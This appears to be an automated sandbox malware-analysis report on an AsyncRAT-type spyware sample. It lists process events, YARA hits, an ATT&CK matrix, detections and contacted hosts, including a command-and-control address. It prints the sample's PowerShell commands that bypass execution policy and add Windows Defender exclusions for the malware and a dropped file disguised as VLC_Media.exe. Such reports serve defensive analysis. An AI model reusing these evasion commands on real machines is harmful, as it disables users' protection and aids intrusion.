                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe'
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Queries volume information: C:\Users\user\Desktop\18fvs4AVae.exe VolumeInformation
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: Yara match | File source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: C:\ProgramData\VLC_Media.exe, type: DROPPED
                            Source: 18fvs4AVae.exe, 00000000.00000002.2977632965.000000001B524000.00000004.00000020.00020000.00000000.sdmp, 18fvs4AVae.exe, 00000000.00000002.2977632965.000000001B480000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            Source: Yara match | File source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: 18fvs4AVae.exe PID: 7396, type: MEMORYSTR
                            Source: Yara match | File source: C:\ProgramData\VLC_Media.exe, type: DROPPED

                            Remote Access Functionality

                            Source: Yara match | File source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara match | File source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: 18fvs4AVae.exe PID: 7396, type: MEMORYSTR
                            Source: Yara match | File source: C:\ProgramData\VLC_Media.exe, type: DROPPED
                            MITRE ATT&CK Matrix (techniques listed per tactic column, in the order the report shows them)

                            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                            Execution: 12 Windows Management Instrumentation; 1 Scheduled Task/Job; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                            Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                            Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                            Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 11 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 151 Virtualization/Sandbox Evasion; 11 Process Injection
                            Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                            Discovery: 1 File and Directory Discovery; 23 System Information Discovery; 541 Security Software Discovery; 1 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery
                            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                            Collection: 11 Archive Collected Data; 1 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                            Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
                            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                            Behavior Graph ID: 1561582 | Sample: 18fvs4AVae.exe | Startdate: 23/11/2024 | Architecture: WINDOWS | Score: 100

                            • Start node: DNS ip-api.com; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures
                            • 18fvs4AVae.exe 14 6 started
                            • Network from 18fvs4AVae.exe: 45.141.26.170, 49738, 7000, SPECTRAIPSpectraIPBVNL, Netherlands; ip-api.com 208.95.112.1, 49730, 80, TUT-ASUS, United States
                            • File dropped by 18fvs4AVae.exe: C:\ProgramData\VLC_Media.exe, PE32
                            • Signatures on 18fvs4AVae.exe: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 3 other signatures
                            • Child processes of 18fvs4AVae.exe: powershell.exe 23; powershell.exe 23; powershell.exe 23; powershell.exe (each started a conhost.exe)
                            • Signature on the first powershell.exe: Loading BitLocker PowerShell Module

                            Source | Detection | Scanner | Label | Link
                            18fvs4AVae.exe | 79% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
                            18fvs4AVae.exe | 100% | Avira | TR/Spy.Gen |
                            18fvs4AVae.exe | 100% | Joe Sandbox ML | |
                            Source | Detection | Scanner | Label | Link
                            C:\ProgramData\VLC_Media.exe | 100% | Avira | TR/Spy.Gen |
                            C:\ProgramData\VLC_Media.exe | 100% | Joe Sandbox ML | |
                            C:\ProgramData\VLC_Media.exe | 79% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
                            No Antivirus matches
                            No Antivirus matches
                            Source | Detection | Scanner | Label | Link
                            45.141.26.170 | 0% | Avira URL Cloud | safe |
                            http://crl.microsg | 0% | Avira URL Cloud | safe |
                            http://crl.microsVa | 0% | Avira URL Cloud | safe |
                            Name | IP | Active | Malicious | Antivirus Detection | Reputation
                            ip-api.com | 208.95.112.1 | true | false | | high
                            Name | Malicious | Antivirus Detection | Reputation
                            45.141.26.170 | true | Avira URL Cloud: safe | unknown
                            http://ip-api.com/line/?fields=hosting | false | | high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.microsgpowershell.exe, 00000001.00000002.1798296730.000002D1B8170000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1791703143.000002D1AFD84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1872550418.000001CE90235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2017198373.000001AD308E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1768182208.000002D19FF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE803E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20A99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1768182208.000002D19FF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE803E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20A99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
URL: https://nuget.org/nuget.exe | Source: powershell.exe, 00000001.00000002.1791703143.000002D1AFD84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1872550418.000001CE90235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2017198373.000001AD308E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
URL: https://contoso.com/License | Source: powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
URL: http://crl.mic | Source: powershell.exe, 00000001.00000002.1797852987.000002D1B8130000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
URL: https://contoso.com/Icon | Source: powershell.exe, 0000000B.00000002.2210782431.0000016B77BC3000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
URL: http://www.microsoft. | Source: powershell.exe, 00000001.00000002.1798381263.000002D1B825B000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
URL: http://crl.micft.cMicRosof | Source: powershell.exe, 00000001.00000002.1797852987.000002D1B8130000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
URL: https://aka.ms/pscore68 | Source: powershell.exe, 00000001.00000002.1768182208.000002D19FD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1823361318.000001CE801C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934588558.000001AD20871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2082830684.0000016B67B51000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
